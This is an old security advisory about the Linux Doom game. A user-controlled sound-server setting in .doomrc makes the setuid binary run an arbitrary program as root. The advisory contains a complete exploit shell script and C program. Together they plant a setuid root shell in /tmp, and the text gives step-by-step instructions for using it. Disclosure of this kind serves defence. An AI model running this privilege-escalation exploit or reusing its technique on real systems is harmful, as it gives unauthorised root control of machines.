COMMAND

    doom

SYSTEMS AFFECTED

    Linux

PROBLEM

    The user  is allowed  to set  a sound  server in  his/her .doomrc.
    Normally, this is set to "sndserver".  However, this can be set to
    *any* program,  and that  program runs  as root!!   Explot  script
    below shows that stupidity.


        #!/bin/sh
        # Tue Dec 17 10:02:20 MET 1996 Bo
        echo 'sndserver "/tmp/sndserver"' > .doomrc
        cat > /tmp/sndserver.c << EOF
        #include <stdio.h>
        #include <unistd.h>
        main() {
                if (fork()) while (getc(stdin));
                else system("cp /bin/sh /tmp; chmod +s /tmp/sh");
                        /* or whatever you like to do */
        }
        EOF
        gcc /tmp/sndserver.c -o /tmp/sndserver

    The  fork()  is  just so that doom runs on nicely without  locking
    up the keyboard   and  sndserver   gobbles  up all  the sound data
    send to it. Run the script, start sdoom, quit the normal way,  and
    execute /tmp/sh.

SOLUTION

    Erase that stupid game!